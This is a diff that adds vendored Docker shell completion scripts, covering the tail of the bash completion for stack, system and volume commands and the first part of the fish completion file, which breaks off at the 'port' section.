+		ls
+		ps
+		rm
+		services
+	"
+	local aliases="
+		down
+		list
+		remove
+		up
+	"
+	__docker_subcommands "$subcommands $aliases" && return
+
+	case "$cur" in
+		-*)
+			COMPREPLY=( $( compgen -W "--help" -- "$cur" ) )
+			;;
+		*)
+			COMPREPLY=( $( compgen -W "$subcommands" -- "$cur" ) )
+			;;
+	esac
+}
+
+_docker_stack_deploy() {
+	case "$prev" in
+		--bundle-file)
+			if __docker_is_experimental ; then
+				_filedir dab
+				return
+			fi
+			;;
+		--compose-file|-c)
+			_filedir yml
+			return
+			;;
+	esac
+
+	case "$cur" in
+		-*)
+			local options="--compose-file -c --help --with-registry-auth"
+			__docker_is_experimental && options+=" --bundle-file"
+			COMPREPLY=( $( compgen -W "$options" -- "$cur" ) )
+			;;
+	esac
+}
+
+_docker_stack_down() {
+	_docker_stack_rm
+}
+
+_docker_stack_list() {
+	_docker_stack_ls
+}
+
+_docker_stack_ls() {
+	case "$cur" in
+		-*)
+			COMPREPLY=( $( compgen -W "--help" -- "$cur" ) )
+			;;
+	esac
+}
+
+_docker_stack_ps() {
+	local key=$(__docker_map_key_of_current_option '--filter|-f')
+	case "$key" in
+		desired-state)
+			COMPREPLY=( $( compgen -W "accepted running" -- "${cur##*=}" ) )
+			return
+			;;
+		id)
+			__docker_complete_stacks --cur "${cur##*=}" --id
+			return
+			;;
+		name)
+			__docker_complete_stacks --cur "${cur##*=}" --name
+			return
+			;;
+	esac
+
+	case "$prev" in
+		--filter|-f)
+			COMPREPLY=( $( compgen -S = -W "id name desired-state" -- "$cur" ) )
+			__docker_nospace
+			return
+			;;
+	esac
+
+	case "$cur" in
+		-*)
+			COMPREPLY=( $( compgen -W "--all -a --filter -f --help --no-resolve --no-trunc" -- "$cur" ) )
+			;;
+		*)
+			local counter=$(__docker_pos_first_nonflag '--filter|-f')
+			if [ $cword -eq $counter ]; then
+				__docker_complete_stacks
+			fi
+			;;
+	esac
+}
+
+_docker_stack_remove() {
+	_docker_stack_rm
+}
+
+_docker_stack_rm() {
+	case "$cur" in
+		-*)
+			COMPREPLY=( $( compgen -W "--help" -- "$cur" ) )
+			;;
+		*)
+			local counter=$(__docker_pos_first_nonflag)
+			if [ $cword -eq $counter ]; then
+				__docker_complete_stacks
+			fi
+			;;
+	esac
+}
+
+_docker_stack_services() {
+	local key=$(__docker_map_key_of_current_option '--filter|-f')
+	case "$key" in
+		id)
+			__docker_complete_services --cur "${cur##*=}" --id
+			return
+			;;
+		label)
+			return
+			;;
+		name)
+			__docker_complete_services --cur "${cur##*=}" --name
+			return
+			;;
+	esac
+
+	case "$prev" in
+		--filter|-f)
+			COMPREPLY=( $( compgen -S = -W "id label name" -- "$cur" ) )
+			__docker_nospace
+			return
+			;;
+	esac
+
+	case "$cur" in
+		-*)
+			COMPREPLY=( $( compgen -W "--filter -f --help --quiet -q" -- "$cur" ) )
+			;;
+		*)
+			local counter=$(__docker_pos_first_nonflag '--filter|-f')
+			if [ $cword -eq $counter ]; then
+				__docker_complete_stacks
+			fi
+			;;
+	esac
+}
+
+_docker_stack_up() {
+	_docker_stack_deploy
+}
+
+
+_docker_start() {
+	_docker_container_start
+}
+
+_docker_stats() {
+	_docker_container_stats
+}
+
+_docker_stop() {
+	_docker_container_stop
+}
+
+
+_docker_system() {
+	local subcommands="
+		df
+		events
+		info
+		prune
+	"
+	__docker_subcommands "$subcommands $aliases" && return
+
+	case "$cur" in
+		-*)
+			COMPREPLY=( $( compgen -W "--help" -- "$cur" ) )
+			;;
+		*)
+			COMPREPLY=( $( compgen -W "$subcommands" -- "$cur" ) )
+			;;
+	esac
+}
+
+_docker_system_df() {
+	case "$cur" in
+		-*)
+			COMPREPLY=( $( compgen -W "--help --verbose -v" -- "$cur" ) )
+			;;
+	esac
+}
+
+_docker_system_events() {
+	local key=$(__docker_map_key_of_current_option '-f|--filter')
+	case "$key" in
+		container)
+			__docker_complete_containers_all --cur "${cur##*=}"
+			return
+			;;
+		daemon)
+			local name=$(__docker_q info | sed -n 's/^\(ID\|Name\): //p')
+			COMPREPLY=( $( compgen -W "$name" -- "${cur##*=}" ) )
+			return
+			;;
+		event)
+			COMPREPLY=( $( compgen -W "
+				attach
+				commit
+				connect
+				copy
+				create
+				delete
+				destroy
+				detach
+				die
+				disconnect
+				exec_create
+				exec_detach
+				exec_start
+				export
+				health_status
+				import
+				kill
+				load
+				mount
+				oom
+				pause
+				pull
+				push
+				reload
+				rename
+				resize
+				restart
+				save
+				start
+				stop
+				tag
+				top
+				unmount
+				unpause
+				untag
+				update
+			" -- "${cur##*=}" ) )
+			return
+			;;
+		image)
+			cur="${cur##*=}"
+			__docker_complete_images
+			return
+			;;
+		network)
+			__docker_complete_networks --cur "${cur##*=}"
+			return
+			;;
+		type)
+			COMPREPLY=( $( compgen -W "container daemon image network volume" -- "${cur##*=}" ) )
+			return
+			;;
+		volume)
+			__docker_complete_volumes --cur "${cur##*=}"
+			return
+			;;
+	esac
+
+	case "$prev" in
+		--filter|-f)
+			COMPREPLY=( $( compgen -S = -W "container daemon event image label network type volume" -- "$cur" ) )
+			__docker_nospace
+			return
+			;;
+		--since|--until)
+			return
+			;;
+	esac
+
+	case "$cur" in
+		-*)
+			COMPREPLY=( $( compgen -W "--filter -f --help --since --until --format" -- "$cur" ) )
+			;;
+	esac
+}
+
+_docker_system_info() {
+	case "$prev" in
+		--format|-f)
+			return
+			;;
+	esac
+
+	case "$cur" in
+		-*)
+			COMPREPLY=( $( compgen -W "--format -f --help" -- "$cur" ) )
+			;;
+	esac
+}
+
+_docker_system_prune() {
+	case "$cur" in
+		-*)
+			COMPREPLY=( $( compgen -W "--all -a --force -f --help" -- "$cur" ) )
+			;;
+	esac
+}
+
+
+_docker_tag() {
+	_docker_image_tag
+}
+
+_docker_unpause() {
+	_docker_container_unpause
+}
+
+_docker_update() {
+	_docker_container_update
+}
+
+_docker_top() {
+	_docker_container_top
+}
+
+_docker_version() {
+	case "$prev" in
+		--format|-f)
+			return
+			;;
+	esac
+
+	case "$cur" in
+		-*)
+			COMPREPLY=( $( compgen -W "--format -f --help" -- "$cur" ) )
+			;;
+	esac
+}
+
+_docker_volume_create() {
+	case "$prev" in
+		--driver|-d)
+			__docker_complete_plugins_bundled --type Volume
+			return
+			;;
+		--label|--opt|-o)
+			return
+			;;
+	esac
+
+	case "$cur" in
+		-*)
+			COMPREPLY=( $( compgen -W "--driver -d --help --label --opt -o" -- "$cur" ) )
+			;;
+	esac
+}
+
+_docker_volume_inspect() {
+	case "$prev" in
+		--format|-f)
+			return
+			;;
+	esac
+
+	case "$cur" in
+		-*)
+			COMPREPLY=( $( compgen -W "--format -f --help" -- "$cur" ) )
+			;;
+		*)
+			__docker_complete_volumes
+			;;
+	esac
+}
+
+_docker_volume_ls() {
+	local key=$(__docker_map_key_of_current_option '--filter|-f')
+	case "$key" in
+		dangling)
+			COMPREPLY=( $( compgen -W "true false" -- "${cur##*=}" ) )
+			return
+			;;
+		driver)
+			__docker_complete_plugins_bundled --cur "${cur##*=}" --type Volume
+			return
+			;;
+		name)
+			__docker_complete_volumes --cur "${cur##*=}"
+			return
+			;;
+	esac
+
+	case "$prev" in
+		--filter|-f)
+			COMPREPLY=( $( compgen -S = -W "dangling driver label name" -- "$cur" ) )
+			__docker_nospace
+			return
+			;;
+		--format)
+			return
+			;;
+	esac
+
+	case "$cur" in
+		-*)
+			COMPREPLY=( $( compgen -W "--filter -f --format --help --quiet -q" -- "$cur" ) )
+			;;
+	esac
+}
+
+_docker_volume_prune() {
+	case "$cur" in
+		-*)
+			COMPREPLY=( $( compgen -W "--force -f --help" -- "$cur" ) )
+			;;
+	esac
+}
+
+_docker_volume_rm() {
+	case "$cur" in
+		-*)
+			COMPREPLY=( $( compgen -W "--force -f --help" -- "$cur" ) )
+			;;
+		*)
+			__docker_complete_volumes
+			;;
+	esac
+}
+
+_docker_volume() {
+	local subcommands="
+		create
+		inspect
+		ls
+		prune
+		rm
+	"
+	__docker_subcommands "$subcommands" && return
+
+	case "$cur" in
+		-*)
+			COMPREPLY=( $( compgen -W "--help" -- "$cur" ) )
+			;;
+		*)
+			COMPREPLY=( $( compgen -W "$subcommands" -- "$cur" ) )
+			;;
+	esac
+}
+
+_docker_wait() {
+	_docker_container_wait
+}
+
+_docker() {
+	local previous_extglob_setting=$(shopt -p extglob)
+	shopt -s extglob
+
+	local management_commands=(
+		container
+		image
+		network
+		node
+		plugin
+		secret
+		service
+		stack
+		system
+		volume
+	)
+
+	local top_level_commands=(
+		build
+		login
+		logout
+		run
+		search
+		version
+	)
+
+	local legacy_commands=(
+		commit
+		cp
+		create
+		diff
+		events
+		exec
+		export
+		history
+		images
+		import
+		info
+		inspect
+		kill
+		load
+		logs
+		pause
+		port
+		ps
+		pull
+		push
+		rename
+		restart
+		rm
+		rmi
+		save
+		start
+		stats
+		stop
+		swarm
+		tag
+		top
+		unpause
+		update
+		wait
+	)
+
+	local experimental_commands=(
+		checkpoint
+		deploy
+	)
+
+	local commands=(${management_commands[*]} ${top_level_commands[*]})
+	[ -z "$DOCKER_HIDE_LEGACY_COMMANDS" ] && commands+=(${legacy_commands[*]})
+
+	# These options are valid as global options for all client commands
+	# and valid as command options for `docker daemon`
+	local global_boolean_options="
+		--debug -D
+		--tls
+		--tlsverify
+	"
+	local global_options_with_args="
+		--config
+		--host -H
+		--log-level -l
+		--tlscacert
+		--tlscert
+		--tlskey
+	"
+
+	local host config
+
+	COMPREPLY=()
+	local cur prev words cword
+	_get_comp_words_by_ref -n : cur prev words cword
+
+	local command='docker' command_pos=0 subcommand_pos
+	local counter=1
+	while [ $counter -lt $cword ]; do
+		case "${words[$counter]}" in
+			# save host so that completion can use custom daemon
+			--host|-H)
+				(( counter++ ))
+				host="${words[$counter]}"
+				;;
+			# save config so that completion can use custom configuration directories
+			--config)
+				(( counter++ ))
+				config="${words[$counter]}"
+				;;
+			$(__docker_to_extglob "$global_options_with_args") )
+				(( counter++ ))
+				;;
+			-*)
+				;;
+			=)
+				(( counter++ ))
+				;;
+			*)
+				command="${words[$counter]}"
+				command_pos=$counter
+				break
+				;;
+		esac
+		(( counter++ ))
+	done
+
+	local binary="${words[0]}"
+	if [[ $binary == ?(*/)dockerd ]] ; then
+		# for the dockerd binary, we reuse completion of `docker daemon`.
+		# dockerd does not have subcommands and global options.
+		command=daemon
+		command_pos=0
+	fi
+
+	local completions_func=_docker_${command}
+	declare -F $completions_func >/dev/null && $completions_func
+
+	eval "$previous_extglob_setting"
+	return 0
+}
+
+eval "$__docker_previous_extglob_setting"
+unset __docker_previous_extglob_setting
+
+complete -F _docker docker dockerd
diff --git a/vendor/github.com/docker/docker/contrib/completion/fish/docker.fish b/vendor/github.com/docker/docker/contrib/completion/fish/docker.fish
new file mode 100644
index 0000000000..2715cb1aa6
--- /dev/null
+++ b/vendor/github.com/docker/docker/contrib/completion/fish/docker.fish
@@ -0,0 +1,405 @@
+# docker.fish - docker completions for fish shell
+#
+# This file is generated by gen_docker_fish_completions.py from:
+# https://github.com/barnybug/docker-fish-completion
+#
+# To install the completions:
+# mkdir -p ~/.config/fish/completions
+# cp docker.fish ~/.config/fish/completions
+#
+# Completion supported:
+# - parameters
+# - commands
+# - containers
+# - images
+# - repositories
+
+function __fish_docker_no_subcommand --description 'Test if docker has yet to be given the subcommand'
+    for i in (commandline -opc)
+        if contains -- $i attach build commit cp create diff events exec export history images import info inspect kill load login logout logs pause port ps pull push rename restart rm rmi run save search start stop tag top unpause version wait stats
+            return 1
+        end
+    end
+    return 0
+end
+
+function __fish_print_docker_containers --description 'Print a list of docker containers' -a select
+    switch $select
+        case running
+            docker ps -a --no-trunc | command awk 'NR>1' | command awk 'BEGIN {FS="  +"}; $5 ~ "^Up" {print $1 "\n" $(NF)}' | tr ',' '\n'
+        case stopped
+            docker ps -a --no-trunc | command awk 'NR>1' | command awk 'BEGIN {FS="  +"}; $5 ~ "^Exit" {print $1 "\n" $(NF)}' | tr ',' '\n'
+        case all
+            docker ps -a --no-trunc | command awk 'NR>1' | command awk 'BEGIN {FS="  +"}; {print $1 "\n" $(NF)}' | tr ',' '\n'
+    end
+end
+
+function __fish_print_docker_images --description 'Print a list of docker images'
+    docker images | command awk 'NR>1' | command grep -v '<none>' | command awk '{print $1":"$2}'
+end
+
+function __fish_print_docker_repositories --description 'Print a list of docker repositories'
+    docker images | command awk 'NR>1' | command grep -v '<none>' | command awk '{print $1}' | command sort | command uniq
+end
+
+# common options
+complete -c docker -f -n '__fish_docker_no_subcommand' -l api-cors-header -d "Set CORS headers in the Engine API. Default is cors disabled"
+complete -c docker -f -n '__fish_docker_no_subcommand' -s b -l bridge -d 'Attach containers to a pre-existing network bridge'
+complete -c docker -f -n '__fish_docker_no_subcommand' -l bip -d "Use this CIDR notation address for the network bridge's IP, not compatible with -b"
+complete -c docker -f -n '__fish_docker_no_subcommand' -s D -l debug -d 'Enable debug mode'
+complete -c docker -f -n '__fish_docker_no_subcommand' -s d -l daemon -d 'Enable daemon mode'
+complete -c docker -f -n '__fish_docker_no_subcommand' -l dns -d 'Force Docker to use specific DNS servers'
+complete -c docker -f -n '__fish_docker_no_subcommand' -l dns-opt -d 'Force Docker to use specific DNS options'
+complete -c docker -f -n '__fish_docker_no_subcommand' -l dns-search -d 'Force Docker to use specific DNS search domains'
+complete -c docker -f -n '__fish_docker_no_subcommand' -l exec-opt -d 'Set runtime execution options'
+complete -c docker -f -n '__fish_docker_no_subcommand' -l fixed-cidr -d 'IPv4 subnet for fixed IPs (e.g. 10.20.0.0/16)'
+complete -c docker -f -n '__fish_docker_no_subcommand' -l fixed-cidr-v6 -d 'IPv6 subnet for fixed IPs (e.g.: 2001:a02b/48)'
+complete -c docker -f -n '__fish_docker_no_subcommand' -s G -l group -d 'Group to assign the unix socket specified by -H when running in daemon mode'
+complete -c docker -f -n '__fish_docker_no_subcommand' -s g -l graph -d 'Path to use as the root of the Docker runtime'
+complete -c docker -f -n '__fish_docker_no_subcommand' -s H -l host -d 'The socket(s) to bind to in daemon mode or connect to in client mode, specified using one or more tcp://host:port, unix:///path/to/socket, fd://* or fd://socketfd.'
+complete -c docker -f -n '__fish_docker_no_subcommand' -s h -l help -d 'Print usage'
+complete -c docker -f -n '__fish_docker_no_subcommand' -l icc -d 'Allow unrestricted inter-container and Docker daemon host communication'
+complete -c docker -f -n '__fish_docker_no_subcommand' -l insecure-registry -d 'Enable insecure communication with specified registries (no certificate verification for HTTPS and enable HTTP fallback) (e.g., localhost:5000 or 10.20.0.0/16)'
+complete -c docker -f -n '__fish_docker_no_subcommand' -l ip -d 'Default IP address to use when binding container ports'
+complete -c docker -f -n '__fish_docker_no_subcommand' -l ip-forward -d 'Enable net.ipv4.ip_forward and IPv6 forwarding if --fixed-cidr-v6 is defined. IPv6 forwarding may interfere with your existing IPv6 configuration when using Router Advertisement.'
+complete -c docker -f -n '__fish_docker_no_subcommand' -l ip-masq -d "Enable IP masquerading for bridge's IP range"
+complete -c docker -f -n '__fish_docker_no_subcommand' -l iptables -d "Enable Docker's addition of iptables rules"
+complete -c docker -f -n '__fish_docker_no_subcommand' -l ipv6 -d 'Enable IPv6 networking'
+complete -c docker -f -n '__fish_docker_no_subcommand' -s l -l log-level -d 'Set the logging level ("debug", "info", "warn", "error", "fatal")'
+complete -c docker -f -n '__fish_docker_no_subcommand' -l label -d 'Set key=value labels to the daemon (displayed in `docker info`)'
+complete -c docker -f -n '__fish_docker_no_subcommand' -l mtu -d 'Set the containers network MTU'
+complete -c docker -f -n '__fish_docker_no_subcommand' -s p -l pidfile -d 'Path to use for daemon PID file'
+complete -c docker -f -n '__fish_docker_no_subcommand' -l registry-mirror -d 'Specify a preferred Docker registry mirror'
+complete -c docker -f -n '__fish_docker_no_subcommand' -s s -l storage-driver -d 'Force the Docker runtime to use a specific storage driver'
+complete -c docker -f -n '__fish_docker_no_subcommand' -l selinux-enabled -d 'Enable selinux support. SELinux does not presently support the BTRFS storage driver'
+complete -c docker -f -n '__fish_docker_no_subcommand' -l storage-opt -d 'Set storage driver options'
+complete -c docker -f -n '__fish_docker_no_subcommand' -l tls -d 'Use TLS; implied by --tlsverify'
+complete -c docker -f -n '__fish_docker_no_subcommand' -l tlscacert -d 'Trust only remotes providing a certificate signed by the CA given here'
+complete -c docker -f -n '__fish_docker_no_subcommand' -l tlscert -d 'Path to TLS certificate file'
+complete -c docker -f -n '__fish_docker_no_subcommand' -l tlskey -d 'Path to TLS key file'
+complete -c docker -f -n '__fish_docker_no_subcommand' -l tlsverify -d 'Use TLS and verify the remote (daemon: verify client, client: verify daemon)'
+complete -c docker -f -n '__fish_docker_no_subcommand' -s v -l version -d 'Print version information and quit'
+
+# subcommands
+# attach
+complete -c docker -f -n '__fish_docker_no_subcommand' -a attach -d 'Attach to a running container'
+complete -c docker -A -f -n '__fish_seen_subcommand_from attach' -l help -d 'Print usage'
+complete -c docker -A -f -n '__fish_seen_subcommand_from attach' -l no-stdin -d 'Do not attach STDIN'
+complete -c docker -A -f -n '__fish_seen_subcommand_from attach' -l sig-proxy -d 'Proxy all received signals to the process (non-TTY mode only). SIGCHLD, SIGKILL, and SIGSTOP are not proxied.'
+complete -c docker -A -f -n '__fish_seen_subcommand_from attach' -a '(__fish_print_docker_containers running)' -d "Container"
+
+# build
+complete -c docker -f -n '__fish_docker_no_subcommand' -a build -d 'Build an image from a Dockerfile'
+complete -c docker -A -f -n '__fish_seen_subcommand_from build' -s f -l file -d "Name of the Dockerfile(Default is 'Dockerfile' at context root)"
+complete -c docker -A -f -n '__fish_seen_subcommand_from build' -l force-rm -d 'Always remove intermediate containers, even after unsuccessful builds'
+complete -c docker -A -f -n '__fish_seen_subcommand_from build' -l help -d 'Print usage'
+complete -c docker -A -f -n '__fish_seen_subcommand_from build' -l no-cache -d 'Do not use cache when building the image'
+complete -c docker -A -f -n '__fish_seen_subcommand_from build' -l pull -d 'Always attempt to pull a newer version of the image'
+complete -c docker -A -f -n '__fish_seen_subcommand_from build' -s q -l quiet -d 'Suppress the build output and print image ID on success'
+complete -c docker -A -f -n '__fish_seen_subcommand_from build' -l rm -d 'Remove intermediate containers after a successful build'
+complete -c docker -A -f -n '__fish_seen_subcommand_from build' -s t -l tag -d 'Repository name (and optionally a tag) to be applied to the resulting image in case of success'
+
+# commit
+complete -c docker -f -n '__fish_docker_no_subcommand' -a commit -d "Create a new image from a container's changes"
+complete -c docker -A -f -n '__fish_seen_subcommand_from commit' -s a -l author -d 'Author (e.g., "John Hannibal Smith <hannibal@a-team.com>")'
+complete -c docker -A -f -n '__fish_seen_subcommand_from commit' -l help -d 'Print usage'
+complete -c docker -A -f -n '__fish_seen_subcommand_from commit' -s m -l message -d 'Commit message'
+complete -c docker -A -f -n '__fish_seen_subcommand_from commit' -s p -l pause -d 'Pause container during commit'
+complete -c docker -A -f -n '__fish_seen_subcommand_from commit' -a '(__fish_print_docker_containers all)' -d "Container"
+
+# cp
+complete -c docker -f -n '__fish_docker_no_subcommand' -a cp -d "Copy files/folders between a container and the local filesystem"
+complete -c docker -A -f -n '__fish_seen_subcommand_from cp' -l help -d 'Print usage'
+
+# create
+complete -c docker -f -n '__fish_docker_no_subcommand' -a create -d 'Create a new container'
+complete -c docker -A -f -n '__fish_seen_subcommand_from create' -s a -l attach -d 'Attach to STDIN, STDOUT or STDERR.'
+complete -c docker -A -f -n '__fish_seen_subcommand_from create' -l add-host -d 'Add a custom host-to-IP mapping (host:ip)'
+complete -c docker -A -f -n '__fish_seen_subcommand_from create' -l cpu-shares -d 'CPU shares (relative weight)'
+complete -c docker -A -f -n '__fish_seen_subcommand_from create' -l cap-add -d 'Add Linux capabilities'
+complete -c docker -A -f -n '__fish_seen_subcommand_from create' -l cap-drop -d 'Drop Linux capabilities'
+complete -c docker -A -f -n '__fish_seen_subcommand_from create' -l cidfile -d 'Write the container ID to the file'
+complete -c docker -A -f -n '__fish_seen_subcommand_from create' -l cpuset -d 'CPUs in which to allow execution (0-3, 0,1)'
+complete -c docker -A -f -n '__fish_seen_subcommand_from create' -l device -d 'Add a host device to the container (e.g. --device=/dev/sdc:/dev/xvdc:rwm)'
+complete -c docker -A -f -n '__fish_seen_subcommand_from create' -l dns -d 'Set custom DNS servers'
+complete -c docker -A -f -n '__fish_seen_subcommand_from create' -l dns-opt -d "Set custom DNS options (Use --dns-opt='' if you don't wish to set options)"
+complete -c docker -A -f -n '__fish_seen_subcommand_from create' -l dns-search -d "Set custom DNS search domains (Use --dns-search=. if you don't wish to set the search domain)"
+complete -c docker -A -f -n '__fish_seen_subcommand_from create' -s e -l env -d 'Set environment variables'
+complete -c docker -A -f -n '__fish_seen_subcommand_from create' -l entrypoint -d 'Overwrite the default ENTRYPOINT of the image'
+complete -c docker -A -f -n '__fish_seen_subcommand_from create' -l env-file -d 'Read in a line delimited file of environment variables'
+complete -c docker -A -f -n '__fish_seen_subcommand_from create' -l expose -d 'Expose a port or a range of ports (e.g. --expose=3300-3310) from the container without publishing it to your host'
+complete -c docker -A -f -n '__fish_seen_subcommand_from create' -l group-add -d 'Add additional groups to run as'
+complete -c docker -A -f -n '__fish_seen_subcommand_from create' -s h -l hostname -d 'Container host name'
+complete -c docker -A -f -n '__fish_seen_subcommand_from create' -l help -d 'Print usage'
+complete -c docker -A -f -n '__fish_seen_subcommand_from create' -s i -l interactive -d 'Keep STDIN open even if not attached'
+complete -c docker -A -f -n '__fish_seen_subcommand_from create' -l ipc -d 'Default is to create a private IPC namespace (POSIX SysV IPC) for the container'
+complete -c docker -A -f -n '__fish_seen_subcommand_from create' -l link -d 'Add link to another container in the form of <name|id>:alias'
+complete -c docker -A -f -n '__fish_seen_subcommand_from create' -s m -l memory -d 'Memory limit (format: <number>[<unit>], where unit = b, k, m or g)'
+complete -c docker -A -f -n '__fish_seen_subcommand_from create' -l mac-address -d 'Container MAC address (e.g. 92:d0:c6:0a:29:33)'
+complete -c docker -A -f -n '__fish_seen_subcommand_from create' -l memory-swap -d "Total memory usage (memory + swap), set '-1' to disable swap (format: <number>[<unit>], where unit = b, k, m or g)"
+complete -c docker -A -f -n '__fish_seen_subcommand_from create' -l name -d 'Assign a name to the container'
+complete -c docker -A -f -n '__fish_seen_subcommand_from create' -l net -d 'Set the Network mode for the container'
+complete -c docker -A -f -n '__fish_seen_subcommand_from create' -s P -l publish-all -d 'Publish all exposed ports to random ports on the host interfaces'
+complete -c docker -A -f -n '__fish_seen_subcommand_from create' -s p -l publish -d "Publish a container's port to the host"
+complete -c docker -A -f -n '__fish_seen_subcommand_from create' -l pid -d 'Default is to create a private PID namespace for the container'
+complete -c docker -A -f -n '__fish_seen_subcommand_from create' -l privileged -d 'Give extended privileges to this container'
+complete -c docker -A -f -n '__fish_seen_subcommand_from create' -l read-only -d "Mount the container's root filesystem as read only"
+complete -c docker -A -f -n '__fish_seen_subcommand_from create' -l restart -d 'Restart policy to apply when a container exits (no, on-failure[:max-retry], always)'
+complete -c docker -A -f -n '__fish_seen_subcommand_from create' -l security-opt -d 'Security Options'
+complete -c docker -A -f -n '__fish_seen_subcommand_from create' -s t -l tty -d 'Allocate a pseudo-TTY'
+complete -c docker -A -f -n '__fish_seen_subcommand_from create' -s u -l user -d 'Username or UID'
+complete -c docker -A -f -n '__fish_seen_subcommand_from create' -s v -l volume -d 'Bind mount a volume (e.g., from the host: -v /host:/container, from Docker: -v /container)'
+complete -c docker -A -f -n '__fish_seen_subcommand_from create' -l volumes-from -d 'Mount volumes from the specified container(s)'
+complete -c docker -A -f -n '__fish_seen_subcommand_from create' -s w -l workdir -d 'Working directory inside the container'
+complete -c docker -A -f -n '__fish_seen_subcommand_from create' -a '(__fish_print_docker_images)' -d "Image"
+
+# diff
+complete -c docker -f -n '__fish_docker_no_subcommand' -a diff -d "Inspect changes on a container's filesystem"
+complete -c docker -A -f -n '__fish_seen_subcommand_from diff' -l help -d 'Print usage'
+complete -c docker -A -f -n '__fish_seen_subcommand_from diff' -a '(__fish_print_docker_containers all)' -d "Container"
+
+# events
+complete -c docker -f -n '__fish_docker_no_subcommand' -a events -d 'Get real time events from the server'
+complete -c docker -A -f -n '__fish_seen_subcommand_from events' -s f -l filter -d "Provide filter values (i.e., 'event=stop')"
+complete -c docker -A -f -n '__fish_seen_subcommand_from events' -l help -d 'Print usage'
+complete -c docker -A -f -n '__fish_seen_subcommand_from events' -l since -d 'Show all events created since timestamp'
+complete -c docker -A -f -n '__fish_seen_subcommand_from events' -l until -d 'Stream events until this timestamp'
+complete -c docker -A -f -n '__fish_seen_subcommand_from events' -l format -d 'Format the output using the given go template'
+
+# exec
+complete -c docker -f -n '__fish_docker_no_subcommand' -a exec -d 'Run a command in a running container'
+complete -c docker -A -f -n '__fish_seen_subcommand_from exec' -s d -l detach -d 'Detached mode: run command in the background'
+complete -c docker -A -f -n '__fish_seen_subcommand_from exec' -l help -d 'Print usage'
+complete -c docker -A -f -n '__fish_seen_subcommand_from exec' -s i -l interactive -d 'Keep STDIN open even if not attached'
+complete -c docker -A -f -n '__fish_seen_subcommand_from exec' -s t -l tty -d 'Allocate a pseudo-TTY'
+complete -c docker -A -f -n '__fish_seen_subcommand_from exec' -a '(__fish_print_docker_containers running)' -d "Container"
+
+# export
+complete -c docker -f -n '__fish_docker_no_subcommand' -a export -d 'Stream the contents of a container as a tar archive'
+complete -c docker -A -f -n '__fish_seen_subcommand_from export' -l help -d 'Print usage'
+complete -c docker -A -f -n '__fish_seen_subcommand_from export' -a '(__fish_print_docker_containers all)' -d "Container"
+
+# history
+complete -c docker -f -n '__fish_docker_no_subcommand' -a history -d 'Show the history of an image'
+complete -c docker -A -f -n '__fish_seen_subcommand_from history' -l help -d 'Print usage'
+complete -c docker -A -f -n '__fish_seen_subcommand_from history' -l no-trunc -d "Don't truncate output"
+complete -c docker -A -f -n '__fish_seen_subcommand_from history' -s q -l quiet -d 'Only show numeric IDs'
+complete -c docker -A -f -n '__fish_seen_subcommand_from history' -a '(__fish_print_docker_images)' -d "Image"
+
+# images
+complete -c docker -f -n '__fish_docker_no_subcommand' -a images -d 'List images'
+complete -c docker -A -f -n '__fish_seen_subcommand_from images' -s a -l all -d 'Show all images (by default filter out the intermediate image layers)'
+complete -c docker -A -f -n '__fish_seen_subcommand_from images' -s f -l filter -d "Provide filter values (i.e., 'dangling=true')"
+complete -c docker -A -f -n '__fish_seen_subcommand_from images' -l help -d 'Print usage'
+complete -c docker -A -f -n '__fish_seen_subcommand_from images' -l no-trunc -d "Don't truncate output"
+complete -c docker -A -f -n '__fish_seen_subcommand_from images' -s q -l quiet -d 'Only show numeric IDs'
+complete -c docker -A -f -n '__fish_seen_subcommand_from images' -a '(__fish_print_docker_repositories)' -d "Repository"
+
+# import
+complete -c docker -f -n '__fish_docker_no_subcommand' -a import -d 'Create a new filesystem image from the contents of a tarball'
+complete -c docker -A -f -n '__fish_seen_subcommand_from import' -l help -d 'Print usage'
+
+# info
+complete -c docker -f -n '__fish_docker_no_subcommand' -a info -d 'Display system-wide information'
+complete -c docker -A -f -n '__fish_seen_subcommand_from info' -s f -l format  -d 'Format the output using the given go template'
+complete -c docker -A -f -n '__fish_seen_subcommand_from info' -l help -d 'Print usage'
+
+# inspect
+complete -c docker -f -n '__fish_docker_no_subcommand' -a inspect -d 'Return low-level information on a container or image'
+complete -c docker -A -f -n '__fish_seen_subcommand_from inspect' -s f -l format -d 'Format the output using the given go template.'
+complete -c docker -A -f -n '__fish_seen_subcommand_from inspect' -l help -d 'Print usage'
+complete -c docker -A -f -n '__fish_seen_subcommand_from inspect' -s s -l size -d 'Display total file sizes if the type is container.'
+complete -c docker -A -f -n '__fish_seen_subcommand_from inspect' -a '(__fish_print_docker_images)' -d "Image"
+complete -c docker -A -f -n '__fish_seen_subcommand_from inspect' -a '(__fish_print_docker_containers all)' -d "Container"
+
+# kill
+complete -c docker -f -n '__fish_docker_no_subcommand' -a kill -d 'Kill a running container'
+complete -c docker -A -f -n '__fish_seen_subcommand_from kill' -l help -d 'Print usage'
+complete -c docker -A -f -n '__fish_seen_subcommand_from kill' -s s -l signal -d 'Signal to send to the container'
+complete -c docker -A -f -n '__fish_seen_subcommand_from kill' -a '(__fish_print_docker_containers running)' -d "Container"
+
+# load
+complete -c docker -f -n '__fish_docker_no_subcommand' -a load -d 'Load an image from a tar archive'
+complete -c docker -A -f -n '__fish_seen_subcommand_from load' -l help -d 'Print usage'
+complete -c docker -A -f -n '__fish_seen_subcommand_from load' -s i -l input -d 'Read from a tar archive file, instead of STDIN'
+
+# login
+complete -c docker -f -n '__fish_docker_no_subcommand' -a login -d 'Log in to a Docker registry server'
+complete -c docker -A -f -n '__fish_seen_subcommand_from login' -l help -d 'Print usage'
+complete -c docker -A -f -n '__fish_seen_subcommand_from login' -s p -l password -d 'Password'
+complete -c docker -A -f -n '__fish_seen_subcommand_from login' -s u -l username -d 'Username'
+
+# logout
+complete -c docker -f -n '__fish_docker_no_subcommand' -a logout -d 'Log out from a Docker registry server'
+
+# logs
+complete -c docker -f -n '__fish_docker_no_subcommand' -a logs -d 'Fetch the logs of a container'
+complete -c docker -A -f -n '__fish_seen_subcommand_from logs' -s f -l follow -d 'Follow log output'
+complete -c docker -A -f -n '__fish_seen_subcommand_from logs' -l help -d 'Print usage'
+complete -c docker -A -f -n '__fish_seen_subcommand_from logs' -s t -l timestamps -d 'Show timestamps'
+complete -c docker -A -f -n '__fish_seen_subcommand_from logs' -l since -d 'Show logs since timestamp'
+complete -c docker -A -f -n '__fish_seen_subcommand_from logs' -l tail -d 'Output the specified number of lines at the end of logs (defaults to all logs)'
+complete -c docker -A -f -n '__fish_seen_subcommand_from logs' -a '(__fish_print_docker_containers running)' -d "Container"
+
+# port
